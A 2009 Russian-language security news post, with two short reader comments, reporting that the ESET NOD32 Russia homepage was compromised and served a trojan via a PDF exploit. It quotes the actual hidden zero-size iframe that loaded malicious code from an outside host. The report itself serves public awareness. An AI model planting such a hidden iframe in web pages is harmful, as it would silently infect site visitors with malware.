Информационная безопасность компьютерных систем и защита конфиденциальных данных
SecuRRity.Ru » Уязвимые сайты » Сайт ESET NOD32 Russia, раздавал трояны
Уязвимые сайты

Сайт ESET NOD32 Russia, раздавал трояны

автор: Administrator | 21 ноября 2009, 08:58 | Просмотров: 7728
теги: Уязвимые сайты, сайта, антивирус, компания, ESET, трояны, PDF-файл, защита, скрытый iframe



Главная страница сайта российского представительства антивирусной компании ESET какое-то время представляла опасность для посетителей.

Судя по сообщению хабраюзера DizelGenerator, при посещении этой странички в браузере Opera, открылся некий PDF-файл, после чего произошла попытка запуска странного исполняемого файла.

DizelGenerator рассказывает как "Вчера, 19.11.2009, зайдя на главную страницу сайта ESET NOD32 Russia, был неприятно удивлен: неожиданно открылся какой-то левый pdf-файл, после чего Comodo Firewall сообщил, что браузер Opera пытается запустить файл wJQs.exe..."

В случае с данным пользователем попытка заражения его компьютера не удалась, благо у него стояла защита в виде файрвола. Однако, судя по всему, попытка эта основывалась на эксплуатации одной из уязвимостей PDF-файлов.

В коде страницы при этом был обнаружен скрытый iframe, откуда на компьютеры пользователей внедрялся, а потом и запускался вредоносный код:
<iframe pcvsn='j6Av392D' src='http://newiframe.com/s/in.cgi?6 ' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe>


Примечательно, что изначально, т.е. по крайней мере с 19 ноября, антивирусный продукт компании ESET, NOD32, эту заразу не распознавал.

Судя по обсуждению данной проблемы на официальных форумах ESET, антивирус Касперского идентифицировал её как Trojan-Downloader.Java.Agent.ab (сигнатура добавлена в базу "Лаборатории Касперского" 18 ноября).

В базы NOD32 новый троян был добавлен в течение суток после того, как DizelGenerator сообщил о своей находке в форуме.

Однако сайт какое-то время после этого так и оставался зараженным. Сейчас вредоносный код с его страниц уже убран, сервис Unmask Parasites определяет этот ресурс как "чистый".

Официальных комментариев со стороны ESET пока не поступало.

Напомним, что сайты антивирусных компаний нередко становятся объектами атак хакеров.

В этом году, например, успели пострадать:
# Лаборатории Касперского
# BitDefender (Португалия)
# F-Secure
# emea.symantec.com
# все сайты компании BitDefender

p.s. все вышеуказанные уязвимости были найдены одной команды - HackersBlog

Также, несколько дней назад один из проектов компании Microsoft - DreamSpark был взломан, а для тех, кто хочет посмотреть весь список сайтов, у которых были проблемы с безопасностью, рекомендуем посмотреть раздел Уязвимые сайты, уверен, что найдёте много интересного!



источник:
webplanet.ru
@ Kolokols
21 ноября 2009, 17:51 | |  
Аватар пользователя Kolokols
карма:
комментариев: 0
новостей: 0
группа: Гости
Благодарю!!!У Вас часто появляются очень интересные посты! Очень поднимаете мое настроение.
@ Роман
30 ноября 2009, 17:30 | |  
Аватар пользователя Роман
карма:
комментариев: 0
новостей: 0
группа: Гости
Да у моего друга тоже эта фигня была))), если бы не файервол, тоже бы пострадал!
Обратная связь

Информация


Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.